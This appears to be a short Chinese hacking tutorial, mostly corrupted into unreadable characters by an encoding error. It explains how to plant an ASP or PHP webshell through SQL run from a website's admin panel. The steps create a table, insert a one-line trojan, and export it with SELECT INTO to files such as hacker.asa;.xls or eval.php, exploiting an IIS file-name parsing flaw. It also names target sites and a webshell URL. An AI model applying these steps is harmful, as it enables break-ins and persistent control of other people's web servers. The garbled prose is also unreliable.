ACCESSִSQLһ仰SHELL
ò˺̨ɶϴݰľСwebshellһֱòһԴ롣һִSQL
ļɺ̨ûʾܡֱļִ֣ѡˣ
Ȼһ仰ľû뵽ɹˡ£
1.create table cmd (a varchar(50))
2.insert into cmd (a) values ()
3.select * into in D:\wwwroot\www.koohik.com\hacker.asa;.xls excel 4.0; from cmd
(ѱcmdݵΪ·һEXCELļ)
4.drop table cmd
IISBUGɹõWEBSHELL
ֱӲ˵http://www.chouwazi.com/data/xiao.asp;xiao.xlsһ仰
SQL˼ͣ
һ
һһAֶεı Ϊcmd ֶΪַ Ϊ50
ڶ
ڱcmdaֶβһ仰ľ
cmdaݵ·e:\host\chouwazi.com\web\data\EXCELļ
ľ
ɾcmd
Ϊԣ
Accessų́SQLִܵWebShell:
Select 'aspһ仰ľ' into in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote
Select 'phpһ仰ľ' into outfile 'F:/wwwroot/chouwazi.com/eval.php';
ִ̨SQL书(voteΪ֪)
ϣԴshellһ˼·
ҳ:
[1]